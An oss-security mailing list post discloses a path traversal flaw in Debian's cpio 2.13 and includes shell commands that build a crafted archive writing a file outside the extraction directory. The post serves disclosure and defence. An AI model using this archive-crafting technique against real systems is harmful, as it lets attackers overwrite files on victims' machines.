Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <65846ba9.7d4fbb18.bm000@oddnet.de>
Date: Thu, 21 Dec 2023 17:44:50 +0100
From: Ingo Brückl <ib@...net.de>
To: oss-security@...ts.openwall.com
Subject: Security vulnerability in Debian's cpio 2.13

Debian has applied patch "revert-CVE-2015-1197-handling" to cpio
(2.13+dfsg-7.1) to "Fix a regression in handling of CVE-2015-1197 &
--no-absolute-filenames by reverting part of an upstream commit." and to
close Debian bugs #946267 ("cpio -i --no-absolute-filenames breaks symlinks
starting with / or /..") and #946469 ("initramfs-tools-core: unmkinitrams
creates broken binaries").

This patch made Debian cpio 2.13 vulnerable to path traversal.

The vulnerability has been reported to the Debian bug tracking system:

  https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1059163

Instructions to craft a cpio archive to demonstrate the vulnerability:

  mkdir test_cpio
  ln -sf /tmp/ test_cpio/tmp
  echo "TEST Traversal" > test_cpio/tmpYtrav.txt
  cd test_cpio/
  ls | cpio -ov > ../trav.cpio
  cd ../
  sed -i s/"tmpY"/"tmp\/"/g trav.cpio

Even

  cpio -id --no-absolute-filenames -I trav.cpio

doesn't prevent path traversal with Debian's cpio, although it does with the
original cpio.

Ingo

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.